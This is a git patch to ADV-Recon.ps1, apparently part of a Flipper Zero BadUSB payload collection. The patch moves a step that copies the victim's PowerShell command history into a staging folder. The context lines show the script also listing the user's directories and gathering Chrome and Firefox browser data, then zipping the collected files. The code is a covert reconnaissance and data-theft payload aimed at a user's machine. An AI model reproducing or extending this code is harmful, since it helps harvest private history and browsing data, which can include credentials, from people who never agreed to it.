From 61d0456955f8b8cab8ec4d9ae0ca7a596e38e845 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Sun, 18 Dec 2022 18:54:32 -0600 Subject: [PATCH] Update ADV-Recon.ps1 --- Payloads/Flip-ADV-Recon/ADV-Recon.ps1 | 9 +++------ 1 file changed, 3 insertions(+), 6 deletions(-) diff --git a/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 b/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 index cac483b..4c3b3ba 100644 --- a/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 +++ b/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 @@ -55,6 +55,9 @@ New-Item -Path $env:tmp/$FolderName -ItemType Directory # Recon all User Directories tree $Env:userprofile /a /f >> $env:TEMP\$FolderName\tree.txt +# Powershell history +Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination $env:TEMP\$FolderName\Powershell-History.txt + ############################################################################################################################################################ function Get-fullName { @@ -504,12 +507,6 @@ Get-BrowserData -Browser "chrome" -DataType "bookmarks" >> $env:TMP\$FolderName\ Get-BrowserData -Browser "firefox" -DataType "history" >> $env:TMP\$FolderName\BrowserData.txt - -############################################################################################################################################################ - -# Powershell history -Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination $env:TEMP\$FolderName\Powershell-History.txt - ############################################################################################################################################################ Compress-Archive -Path $env:tmp/$FolderName -DestinationPath $env:tmp/$ZIP